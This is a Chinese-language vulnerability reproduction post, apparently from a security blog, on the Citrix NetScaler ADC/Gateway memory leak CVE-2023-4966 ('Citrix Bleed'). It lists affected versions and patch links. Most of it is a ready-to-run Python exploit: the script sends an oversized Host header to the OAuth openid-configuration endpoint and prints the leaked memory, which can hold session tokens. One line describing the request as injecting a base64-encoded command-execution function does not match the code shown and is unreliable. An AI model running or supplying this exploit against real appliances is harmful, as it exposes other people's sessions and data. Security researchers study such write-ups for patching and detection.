0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Citrix Systems Citrix NetScaler Gateway(Citrix Systems Gateway)和Citrix Systems NetScaler ADC都是美国思杰系统(Citrix Systems)公司的产品。Citrix NetScaler Gateway是一套安全的远程接入解决方案。该方案可为管理员提供应用级和数据级管控功能,以实现用户从任何地点远程访问应用和数据。Citrix Systems NetScaler ADC是一个应用程序交付和安全平台。

NetScaler ADC和NetScaler Gateway存在安全漏洞,该漏洞源于存在敏感信息泄露。

0x02影响版本

NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50

NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15

NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19

NetScaler ADC 13.1-FIPS < 13.1-37.164

NetScaler ADC 12.1-FIPS < 12.1-55.300

NetScaler ADC 12.1-NDcPP < 12.1-55.300

微信图片_20231029003222_副本.png

0x03漏洞复现

1.访问漏洞环境

微信图片_20231029003406_副本.png

2.对漏洞进行复现

POC (GET)

漏洞复现

GET请求,注入命令执行函数并进行base64编码

GET /oauth/idp/.well-known/openid-configuration HTTP/1.1

Host: 127.0.0.1
微信图片_20231029003606_副本.png

3.python脚本测试(漏洞存在)

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")
微信图片_20231029003720_副本.png

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://support.citrix.com/article/CTX579459
https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966